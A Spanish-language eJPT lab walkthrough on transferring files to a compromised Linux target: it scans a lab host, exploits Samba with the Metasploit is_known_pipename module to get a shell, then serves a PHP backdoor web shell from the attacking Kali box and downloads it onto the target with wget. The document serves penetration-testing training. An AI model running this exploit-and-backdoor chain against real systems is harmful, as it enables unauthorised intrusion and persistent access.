> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/post-explotacion/transferencia-de-archivos/transferencia-de-archivos-a-destinos-linux.md).

# Transferencia de archivos a destinos linux

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/E7W10VDJZFSQM6rioscS" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verifique si la máquina de destino es accesible:

**Dominio:**

```
ping -c 4 demo.ine.local
```

<figure><img src="/files/Hj9tRj44Z9OTqqQibm26" alt=""><figcaption></figcaption></figure>

El objetivo es alcanzable.

**Paso 3:** Escaneo de puertos con Nmap.

Antes de que podamos comenzar el proceso de transferencia de archivos a un sistema Linux, necesitaremos obtener acceso al sistema de destino.

Para empezar, necesitamos identificar un servicio vulnerable ejecutándose en el sistema objetivo. Esto se puede lograr mediante un análisis de detección de versiones del servicio con Nmap.

**Dominio:**

```
nmap -sV demo.ine.local
```

Como se muestra en la siguiente captura de pantalla, el escaneo de Nmap revela una versión vulnerable de SAMBA que se ejecuta en el puerto 445 y que puede explotarse mediante el uso de un módulo Metasploit.

<figure><img src="/files/uZ5WSGQiP52kQZh08yJ5" alt=""><figcaption></figcaption></figure>

**Paso 4:** Obtener acceso.

Para poder utilizar este módulo de exploit, necesitaremos iniciar la Consola de Metasploit Framework (msfconsole), esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
msfconsole
```

<figure><img src="/files/T7ffXUdp5McfeU1cOs8K" alt=""><figcaption></figcaption></figure>

Después de iniciar msfconsole, podemos cargar el módulo ejecutando el siguiente comando:

**Dominio:**

```
use exploit/linux/samba/is_known_pipename
```

<figure><img src="/files/J6lS6NTBmgAPGTT7juED" alt=""><figcaption></figcaption></figure>

Ahora tendremos que configurar las opciones del módulo; más específicamente, establecer el objetivo. Esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
set RHOSTS demo.ine.local
```

<figure><img src="/files/yriCNgQStO2lMBZz32kA" alt=""><figcaption></figcaption></figure>

Después de configurar las opciones del módulo, podemos ejecutar el módulo de exploit ejecutando el siguiente comando:

**Dominio:**

```
exploit
```

Como se muestra en la siguiente captura de pantalla, el módulo de explotación se ejecuta con éxito y nos proporciona una sesión de shell de comando en el sistema de destino.

<figure><img src="/files/EHZvLt74Xg02igHAklcl" alt=""><figcaption></figcaption></figure>

Ahora que hemos obtenido acceso al sistema de destino Linux, podemos explorar el proceso de transferencia de archivos al sistema de destino Linux.

**Paso 5:** Transferir archivos al destino Linux.

Transferiremos el archivo **php-backdoor.php que se encuentra en el directorio /usr/share/webshells/php/** en la máquina Kali.

Abra una nueva terminal y navegue al directorio ejecutando el siguiente comando:

**Dominio:**

```
cd /usr/share/webshells/php/
```

Luego podemos iniciar un servidor web con Python3 en este directorio ejecutando el siguiente comando:

**Dominio:**

```
python3 -m http.server 80
```

<figure><img src="/files/fGXyMzemF9nc6gcfjB56" alt=""><figcaption></figcaption></figure>

Regrese a la sesión del shell de comandos en el sistema de destino y descargue el archivo **php-backdoor.php** del servidor web alojado en el sistema Kali Linux ejecutando el siguiente comando:

Asegúrese de reemplazar la dirección IP en el siguiente comando con la de su máquina Kali.

**Dominio:**

```
wget http://192.217.117.2/php-backdoor.php
```

Como se muestra en la siguiente captura de pantalla, el archivo **php-backdoor.php** se descarga correctamente en el sistema Linux.

<figure><img src="/files/QJtta286Na60ErmaOeqb" alt=""><figcaption></figcaption></figure>

#### Conclusión

En este laboratorio, exploramos el proceso de transferencia de archivos desde un servidor web alojado en Kali Linux a un destino Linux con la utilidad wget.
